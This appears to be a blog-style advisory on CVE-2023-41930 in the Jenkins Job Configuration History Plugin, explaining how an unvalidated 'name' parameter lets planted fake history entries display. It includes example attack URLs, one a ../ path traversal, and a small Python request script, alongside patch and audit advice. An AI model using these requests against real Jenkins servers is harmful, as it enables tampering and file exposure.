CVE-2023-41930 - Exploiting the Jenkins Job Configuration History Plugin (1227.v7a_79fc4dc01f and Earlier)

On September 2023, Jenkins revealed an important security vulnerability affecting its Job Configuration History Plugin. Identified as CVE-2023-41930, this vulnerability opens the doors for attackers to inject and display manipulated job history—making it seem as if those changes actually occurred. Let’s break down what this means, the technical impact, how the exploit works, and how you can protect yourself.

What is the Jenkins Job Configuration History Plugin?

Jenkins is a popular open-source automation server used to automate building, testing, and deploying software. The Job Configuration History Plugin records all changes made to job configurations, letting users review and restore old configurations if needed.

What’s the Problem? (The Vulnerability Explained)

Before version 1227.v7a_79fc4dc01f, the plugin failed to restrict the 'name' parameter. This parameter is used to identify which job’s history to show. The problem: the plugin trusted this input entirely, allowing attackers to ask Jenkins to display "fake" or manipulated history files—even if those history entries were never created by Jenkins or the plugin.

This can confuse administrators and developers, possibly hiding real changes or faking a configuration that never existed.

A Simple Analogy

Imagine you keep a notebook logging every change to your project. Now anyone can stick fake pages in, convincing you they made some change, and you couldn’t tell the difference!

How is the name Parameter Used?

When you view configuration history through the plugin’s web interface, Jenkins calls a URL with a query like:

http://jenkins.example.com/job/YourJob/config-history/showHistoryEntry?name=2022-12-08_13-45-24

The name parameter references a timestamped file (or directory) inside the history archive. But before version 1227.v7a_79fc4dc01f, the plugin did not validate this input. Attackers could specify arbitrary values, including path traversal or pointing to a file they created themselves.

Writable Directories and Dropping Fake History

Suppose an attacker is able to write files somewhere on the server (via other vulnerabilities, or poor server configuration) — or they can leverage weaknesses in the file structure.

Example Exploitation

Let’s assume the history dir is /var/lib/jenkins/config-history/jobs/YourJob/. An attacker uploads a file:

/var/lib/jenkins/config-history/jobs/YourJob/_malicious-history.xml

He can now craft a URL like

http://jenkins.example.com/job/YourJob/config-history/showHistoryEntry?name=_malicious-history

The plugin, trusting the name parameter, displays the attacker’s fake history entry.

Here's a simple request in Python (for educational purposes)

import requests

jenkins_url = 'http://jenkins.example.com/job/YourJob/config-history/showHistoryEntry';
params = { 'name': '_malicious-history' }

# If Jenkins is not publicly exposed, you'd need internal access.
r = requests.get(jenkins_url, params=params)
print(r.text)

If _malicious-history is a file the attacker created and Jenkins can read it—it’ll render in the UI as legit history.

If the plugin also fails to sanitize ../, an even more severe path traversal may be possible

http://jenkins.example.com/job/YourJob/config-history/showHistoryEntry?name=../../../../tmp/evilfile

Now Jenkins is tricked into rendering unexpected files.

Security Impact

- Phishing and Social Engineering: Displaying fake configuration changes can mislead admins/developers
- Persistence: Attacker can “plant” a fake config history, suggesting suspicious changes were “always” there
- Data Leak/Integrity: If path traversal is possible, sensitive (unrelated) files may be exposed through Jenkins UI

Original References

- Jenkins Security Advisory: CVE-2023-41930
- Jenkins Job Configuration History Plugin
- NVD CVE-2023-41930 Record

How To Fix

Update immediately!
Version 1228.v8d35b_43b_7206 and later patches this vulnerability by adding stricter validation for the 'name' parameter.

Check Jenkins logs for odd showHistoryEntry queries

- Audit the /var/lib/jenkins/config-history/ directory for unknown or unexpected files
- Run security scanners over your Jenkins server (try Jenkins Security Inspector)

Conclusion

CVE-2023-41930 may not drop a shell, but it can mess with your Jenkins’ integrity and sow confusion. If you run Jenkins with Job Configuration History Plugin at or below 1227.v7a_79fc4dc01f, update now. Always treat any input from users with caution—even for seemingly benign tools like history viewers.

Stay updated and keep your pipelines safe!

*Exclusively written for you. Need help with Jenkins security? Let me know in the comments.*

Timeline

Published on: 09/06/2023 13:15:09 UTC
Last modified on: 09/11/2023 19:23:34 UTC